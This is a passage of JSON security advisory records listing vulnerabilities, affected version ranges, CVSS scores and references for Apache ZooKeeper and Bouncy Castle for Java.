"versions": [ "3.9.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-7286-pgfv-vxvh/GHSA-7286-pgfv-vxvh.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-44981" }, { "type": "PACKAGE", "url": "https://github.com/apache/zookeeper" }, { "type": "WEB", "url": "https://lists.apache.org/thread/wf0yrk84dg1942z1o74kd8nycg6pgm5b" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00029.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240621-0007" }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5544" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2023/10/11/4" } ], "database_specific": { "cwe_ids": [ "CWE-639" ], "github_reviewed": true, "github_reviewed_at": "2023-10-11T20:36:50Z", "nvd_published_at": "2023-10-11T12:15:11Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-7cwj-j333-x7f7", "published": "2022-05-13T01:08:23Z", "modified": "2023-11-08T03:59:22.246576Z", "aliases": [ "CVE-2017-5637" ], "summary": "Uncontrolled Resource Consumption in Apache ZooKeeper", "details": "Two four letter word commands \"wchp/wchc\" are CPU intensive and could cause spike of CPU utilization on Apache ZooKeeper server if abused, which leads to the server unable to serve legitimate client requests. Apache ZooKeeper thru version 3.4.9 and 3.5.2 suffer from this issue, fixed in 3.4.10, 3.5.3, and later.", "affected": [ { "package": { "name": "org.apache.zookeeper:zookeeper", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.zookeeper/zookeeper" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.4.0" }, { "fixed": "3.4.10" } ] } ], "versions": [ "3.4.0", "3.4.1", "3.4.2", "3.4.3", "3.4.4", "3.4.5", "3.4.6", "3.4.7", "3.4.8", "3.4.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 3.4.9", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-7cwj-j333-x7f7/GHSA-7cwj-j333-x7f7.json" } }, { "package": { "name": "org.apache.zookeeper:zookeeper", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.zookeeper/zookeeper" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.5.0" }, { "fixed": "3.5.3" } ] } ], "versions": [ "3.5.1-alpha", "3.5.2-alpha", "3.5.3-beta" ], "database_specific": { "last_known_affected_version_range": "\u003c= 3.5.2", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-7cwj-j333-x7f7/GHSA-7cwj-j333-x7f7.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-5637" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:2477" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:3354" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:3355" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/ZOOKEEPER-2693" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/053d9ce4d579b02203db18545fee5e33f35f2932885459b74d1e4272@%3Cissues.activemq.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/58170aeb7a681d462b7fa31cae81110cbb749d2dc83c5736a0bb8370@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "http://www.debian.org/security/2017/dsa-3871" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/98814" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2022-07-01T16:58:11Z", "nvd_published_at": "2017-10-10T01:30:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-ccqf-c5hq-77mp", "published": "2022-05-13T01:05:57Z", "modified": "2023-11-08T04:00:23.872615Z", "aliases": [ "CVE-2018-8012" ], "summary": "Missing Authorization in Apache ZooKeeper", "details": "No authentication/authorization is enforced when a server attempts to join a quorum in Apache ZooKeeper before 3.4.10, and 3.5.0-alpha through 3.5.3-beta. As a result an arbitrary end point could join the cluster and begin propagating counterfeit changes to the leader.", "affected": [ { "package": { "name": "org.apache.zookeeper:zookeeper", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.zookeeper/zookeeper" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "3.4.10" } ] } ], "versions": [ "3.3.0", "3.3.1", "3.3.2", "3.3.3", "3.3.4", "3.3.5", "3.3.6", "3.4.0", "3.4.1", "3.4.2", "3.4.3", "3.4.4", "3.4.5", "3.4.6", "3.4.7", "3.4.8", "3.4.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 3.4.9", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-ccqf-c5hq-77mp/GHSA-ccqf-c5hq-77mp.json" } }, { "package": { "name": "org.apache.zookeeper:zookeeper", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.zookeeper/zookeeper" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.5.0-alpha" }, { "fixed": "3.5.4-beta" } ] } ], "versions": [ "3.5.0-alpha", "3.5.1-alpha", "3.5.2-alpha", "3.5.3-beta" ], "database_specific": { "last_known_affected_version_range": "\u003c= 3.5.3-beta", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-ccqf-c5hq-77mp/GHSA-ccqf-c5hq-77mp.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-8012" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/053d9ce4d579b02203db18545fee5e33f35f2932885459b74d1e4272@%3Cissues.activemq.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/c75147028c1c79bdebd4f8fa5db2b77da85de2b05ecc0d54d708b393@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r73daf1fc5d85677d9a854707e1908d14e174b7bbb0c603709c0ab33f@%3Coak-commits.jackrabbit.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8f0d920805af93033c488af89104e2d682662bacfb8406db865d5e14@%3Cdev.jackrabbit.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc5bc4ddb0deabf8cfb69378cecee56fcdc76929bea9e6373cb863870@%3Cdev.jackrabbit.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re3a4048e9515d4afea416df907a612ed384a16c57cf99e97ee4a12f2@%3Cdev.jackrabbit.apache.org%3E" }, { "type": "WEB", "url": "https://www.debian.org/security/2018/dsa-4214" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/104253" }, { "type": "WEB", "url": "http://www.securitytracker.com/id/1040948" } ], "database_specific": { "cwe_ids": [ "CWE-862" ], "github_reviewed": true, "github_reviewed_at": "2022-06-29T19:03:52Z", "nvd_published_at": "2018-05-21T19:29:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-g93m-8x6h-g5gv", "published": "2024-11-07T12:30:35Z", "modified": "2025-06-30T18:59:23.345066Z", "aliases": [ "BIT-zookeeper-2024-51504", "CVE-2024-51504" ], "summary": "Apache ZooKeeper: Authentication bypass with IP-based authentication in Admin Server", "details": "When using IPAuthenticationProvider in ZooKeeper Admin Server there is a possibility of Authentication Bypass by Spoofing -- this only impacts IP based authentication implemented in ZooKeeper Admin Server. Default configuration of client's IP address detection in IPAuthenticationProvider, which uses HTTP request headers, is weak and allows an attacker to bypass authentication via spoofing client's IP address in request headers. Default configuration honors X-Forwarded-For HTTP header to read client's IP address. X-Forwarded-For request header is mainly used by proxy servers to identify the client and can be easily spoofed by an attacker pretending that the request comes from a different IP address. Admin Server commands, such as snapshot and restore arbitrarily can be executed on successful exploitation which could potentially lead to information leakage or service availability issues. Users are recommended to upgrade to version 3.9.3, which fixes this issue.", "affected": [ { "package": { "name": "org.apache.zookeeper:zookeeper", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.zookeeper/zookeeper" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.9.0" }, { "fixed": "3.9.3" } ] } ], "versions": [ "3.9.0", "3.9.1", "3.9.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/11/GHSA-g93m-8x6h-g5gv/GHSA-g93m-8x6h-g5gv.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-51504" }, { "type": "WEB", "url": "https://github.com/apache/zookeeper/commit/2c2b74c1c11b6531aabb1bf06782e859048d5983" }, { "type": "PACKAGE", "url": "https://github.com/apache/zookeeper" }, { "type": "WEB", "url": "https://lists.apache.org/thread/b3qrmpkto5r6989qr61fw9y2x646kqlh" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2024/11/06/5" } ], "database_specific": { "cwe_ids": [ "CWE-290" ], "github_reviewed": true, "github_reviewed_at": "2025-06-30T18:49:25Z", "nvd_published_at": "2024-11-07T10:15:08Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:H/SC:N/SI:N/SA:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-r978-9m6m-6gm6", "published": "2024-03-15T12:30:37Z", "modified": "2025-07-03T16:14:55.159008Z", "aliases": [ "BIT-zookeeper-2024-23944", "CVE-2024-23944" ], "related": [ "CGA-7x45-jmmj-p4h3", "CGA-h562-6hp9-9x2q", "CGA-mrr6-55fr-72mh", "CGA-rgr4-3vcx-cj8x", "CGA-wvcw-6w45-h72m" ], "summary": "Apache ZooKeeper vulnerable to information disclosure in persistent watchers handling", "details": "Information disclosure in persistent watchers handling in Apache ZooKeeper due to missing ACL check. It allows an attacker to monitor child znodes by attaching a persistent watcher (addWatch command) to a parent which the attacker has already access to. ZooKeeper server doesn't do ACL check when the persistent watcher is triggered and as a consequence, the full path of znodes that a watch event gets triggered upon is exposed to the owner of the watcher. It's important to note that only the path is exposed by this vulnerability, not the data of znode, but since znode path can contain sensitive information like user name or login ID, this issue is potentially critical.\n\nUsers are recommended to upgrade to version 3.9.2, 3.8.4 which fixes the issue.", "affected": [ { "package": { "name": "org.apache.zookeeper:zookeeper", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.zookeeper/zookeeper" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.8.0" }, { "fixed": "3.8.4" } ] } ], "versions": [ "3.8.0", "3.8.1", "3.8.2", "3.8.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 3.8.3", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/03/GHSA-r978-9m6m-6gm6/GHSA-r978-9m6m-6gm6.json" } }, { "package": { "name": "org.apache.zookeeper:zookeeper", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.zookeeper/zookeeper" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.9.0" }, { "fixed": "3.9.2" } ] } ], "versions": [ "3.9.0", "3.9.1" ], "database_specific": { "last_known_affected_version_range": "\u003c= 3.9.1", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/03/GHSA-r978-9m6m-6gm6/GHSA-r978-9m6m-6gm6.json" } }, { "package": { "name": "org.apache.zookeeper:zookeeper", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.zookeeper/zookeeper" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.6.0" }, { "last_affected": "3.7.2" } ] } ], "versions": [ "3.6.0", "3.6.1", "3.6.2", "3.6.3", "3.6.4", "3.7.0", "3.7.1", "3.7.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/03/GHSA-r978-9m6m-6gm6/GHSA-r978-9m6m-6gm6.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23944" }, { "type": "WEB", "url": "https://github.com/apache/zookeeper/commit/29c7b9462681f47c2ac12e609341cf9f52abac5c" }, { "type": "WEB", "url": "https://github.com/apache/zookeeper/commit/65b91d2d9a56157285c2a86b106e67c26520b01d" }, { "type": "WEB", "url": "https://github.com/apache/zookeeper/commit/daf7cfd04005cff1a4f7cab5ab13d41db88d0cd8" }, { "type": "PACKAGE", "url": "https://github.com/apache/zookeeper" }, { "type": "WEB", "url": "https://lists.apache.org/thread/96s5nqssj03rznz9hv58txdb2k1lr79k" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2024/03/14/2" } ], "database_specific": { "cwe_ids": [ "CWE-200", "CWE-862" ], "github_reviewed": true, "github_reviewed_at": "2024-03-15T19:35:37Z", "nvd_published_at": "2024-03-15T11:15:08Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-4cx2-fc23-5wg6", "published": "2025-08-13T12:31:30Z", "modified": "2025-10-17T14:20:44.810668Z", "aliases": [ "CVE-2025-8916" ], "summary": "Bouncy Castle for Java bcpkix, bcprov, bcpkix-fips on All (API modules) allows Excessive Allocation", "details": "Allocation of Resources Without Limits or Throttling vulnerability in Legion of the Bouncy Castle Inc. Bouncy Castle for Java bcpkix, bcprov, bcpkix-fips on All (API modules) allows Excessive Allocation. This vulnerability is associated with program files https://github.Com/bcgit/bc-java/blob/main/pkix/src/main/java/org/bouncycastle/pkix/jcajce/PKIXCertP... https://github.Com/bcgit/bc-java/blob/main/pkix/src/main/java/org/bouncycastle/pkix/jcajce/PKIXCertPathReviewer.java , https://github.Com/bcgit/bc-java/blob/main/prov/src/main/java/org/bouncycastle/x509/PKIXCertPathRevi... https://github.Com/bcgit/bc-java/blob/main/prov/src/main/java/org/bouncycastle/x509/PKIXCertPathReviewer.java .\n\nThis issue affects Bouncy Castle for Java: from BC 1.44 through 1.78, from BCPKIX FIPS 1.0.0 through 1.0.7, from BCPKIX FIPS 2.0.0 through 2.0.7.", "affected": [ { "package": { "name": "org.bouncycastle:bcpkix-jdk15on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcpkix-jdk15on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.44" }, { "fixed": "1.79" } ] } ], "versions": [ "1.47", "1.48", "1.49", "1.50", "1.51", "1.52", "1.53", "1.54", "1.55", "1.56", "1.57", "1.58", "1.59", "1.60", "1.61", "1.62", "1.63", "1.64", "1.65", "1.66", "1.67", "1.68", "1.69", "1.70" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/08/GHSA-4cx2-fc23-5wg6/GHSA-4cx2-fc23-5wg6.json" } }, { "package": { "name": "org.bouncycastle:bcpkix-jdk15to18", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcpkix-jdk15to18" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.44" }, { "fixed": "1.79" } ] } ], "versions": [ "1.63", "1.64", "1.65", "1.66", "1.67", "1.68", "1.69", "1.70", "1.71", "1.72", "1.73", "1.74", "1.75", "1.76", "1.77", "1.78", "1.78.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/08/GHSA-4cx2-fc23-5wg6/GHSA-4cx2-fc23-5wg6.json" } }, { "package": { "name": "org.bouncycastle:bcpkix-jdk18on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcpkix-jdk18on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.44" }, { "fixed": "1.79" } ] } ], "versions": [ "1.71", "1.71.1", "1.72", "1.73", "1.74", "1.75", "1.76", "1.77", "1.78", "1.78.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/08/GHSA-4cx2-fc23-5wg6/GHSA-4cx2-fc23-5wg6.json" } }, { "package": { "name": "org.bouncycastle:bcpkix-fips", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcpkix-fips" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.0.0" }, { "fixed": "1.0.8" } ] } ], "versions": [ "1.0.0", "1.0.1", "1.0.2", "1.0.3", "1.0.4", "1.0.5", "1.0.6", "1.0.7" ], "database_specific": { "last_known_affected_version_range": "\u003c= 1.0.7", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/08/GHSA-4cx2-fc23-5wg6/GHSA-4cx2-fc23-5wg6.json" } }, { "package": { "name": "org.bouncycastle:bcpkix-fips", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcpkix-fips" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.0.8" } ] } ], "versions": [ "2.0.7" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.0.7", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/08/GHSA-4cx2-fc23-5wg6/GHSA-4cx2-fc23-5wg6.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8916" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/commit/310b30a4fbf36d13f6cc201ffa7771715641e67e" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/commit/ff444a479942d88de64004dc82c3ee32a9e9075a" }, { "type": "PACKAGE", "url": "https://github.com/bcgit/bc-java" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/wiki/CVE%E2%80%902025%E2%80%908916" } ], "database_specific": { "cwe_ids": [ "CWE-770" ], "github_reviewed": true, "github_reviewed_at": "2025-08-13T22:52:42Z", "nvd_published_at": "2025-08-13T10:15:27Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/S:P/R:U/RE:M/U:Amber" } ] }, { "schema_version": "1.7.3", "id": "GHSA-2j2x-hx4g-2gf4", "published": "2018-10-18T17:43:55Z", "modified": "2025-09-12T20:13:20.576466Z", "aliases": [ "CVE-2016-1000344" ], "summary": "In Bouncy Castle JCE Provider the DHIES implementation allowed the use of ECB mode", "details": "In the Bouncy Castle JCE Provider version 1.55 and earlier the DHIES implementation allowed the use of ECB mode. This mode is regarded as unsafe and support for it has been removed from the provider.", "affected": [ { "package": { "name": "org.bouncycastle:bcprov-jdk14", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk14" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.56" } ] } ], "versions": [ "1.38", "1.43", "1.44", "1.45", "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.53", "1.54", "1.55" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-2j2x-hx4g-2gf4/GHSA-2j2x-hx4g-2gf4.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.56" } ] } ], "versions": [ "1.32", "1.38", "1.40", "1.43", "1.44", "1.45", "1.46" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-2j2x-hx4g-2gf4/GHSA-2j2x-hx4g-2gf4.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.56" } ] } ], "versions": [ "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.52", "1.53", "1.54", "1.55" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-2j2x-hx4g-2gf4/GHSA-2j2x-hx4g-2gf4.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-1000344" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/commit/9385b0ebd277724b167fe1d1456e3c112112be1f" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2669" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2927" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-2j2x-hx4g-2gf4" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20181127-0004" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" } ], "database_specific": { "cwe_ids": [ "CWE-1310" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T20:52:17Z", "nvd_published_at": "2018-06-04T21:29:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-4446-656p-f54g", "published": "2018-10-17T16:23:12Z", "modified": "2025-05-12T21:48:36.833343Z", "aliases": [ "CVE-2018-1000613" ], "summary": "Deserialization of Untrusted Data in Bouncy castle", "details": "Legion of the Bouncy Castle Java Cryptography APIs starting in version 1.57 and prior to version 1.60 contains a CWE-470: Use of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection') vulnerability in XMSS/XMSS^MT private key deserialization that can result in Deserializing an XMSS/XMSS^MT private key can result in the execution of unexpected code. This attack appear to be exploitable via A handcrafted private key can include references to unexpected classes which will be picked up from the class path for the executing application. \n\nThis vulnerability appears to have been fixed in 1.60 and later.", "affected": [ { "package": { "name": "org.bouncycastle:bcprov-jdk15on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.57" }, { "fixed": "1.60" } ] } ], "versions": [ "1.57", "1.58", "1.59" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-4446-656p-f54g/GHSA-4446-656p-f54g.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000613" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/commit/4092ede58da51af9a21e4825fbad0d9a3ef5a223#diff-2c06e2edef41db889ee14899e12bd574" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/commit/cc9f91c41be67e88fca4e38f4872418448950fd9" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/commit/cd98322b171b15b3f88c5ec871175147893c31e6#diff-148a6c098af0199192d6aede960f45dc" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-4446-656p-f54g" }, { "type": "PACKAGE", "url": "https://github.com/bcgit/bc-java" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20190204-0003" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00011.html" } ], "database_specific": { "cwe_ids": [ "CWE-470", "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T20:57:10Z", "nvd_published_at": "2018-07-09T20:29:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-4mv7-cq75-3qjm", "published": "2018-10-17T16:27:50Z", "modified": "2025-09-12T20:11:53.388848Z", "aliases": [ "CVE-2015-7940" ], "summary": "Moderate severity vulnerability that affects org.bouncycastle:bcprov-jdk14 and org.bouncycastle:bcprov-jdk15", "details": "The Bouncy Castle Java library before 1.51 does not validate a point is withing the elliptic curve, which makes it easier for remote attackers to obtain private keys via a series of crafted elliptic curve Diffie Hellman (ECDH) key exchanges, aka an \"invalid curve attack.\"", "affected": [ { "package": { "name": "org.bouncycastle:bcprov-jdk15", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.51" } ] } ], "versions": [ "1.32", "1.38", "1.40", "1.43", "1.44", "1.45", "1.46" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-4mv7-cq75-3qjm/GHSA-4mv7-cq75-3qjm.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk14", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk14" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.51" } ] } ], "versions": [ "1.38", "1.43", "1.44", "1.45", "1.46", "1.47", "1.48", "1.49", "1.50" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-4mv7-cq75-3qjm/GHSA-4mv7-cq75-3qjm.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.51" } ] } ], "versions": [ "1.46", "1.47", "1.48", "1.49", "1.50" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-4mv7-cq75-3qjm/GHSA-4mv7-cq75-3qjm.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-7940" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-4mv7-cq75-3qjm" }, { "type": "WEB", "url": "https://usn.ubuntu.com/3727-1" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html" }, { "type": "WEB", "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-January/174915.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2015-11/msg00012.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2016-2035.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2016-2036.html" }, { "type": "WEB", "url": "http://web-in-security.blogspot.ca/2015/09/practical-invalid-curve-attacks.html" }, { "type": "WEB", "url": "http://www.debian.org/security/2015/dsa-3417" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2015/10/22/7" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2015/10/22/9" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html" }, { "type": "WEB", "url": 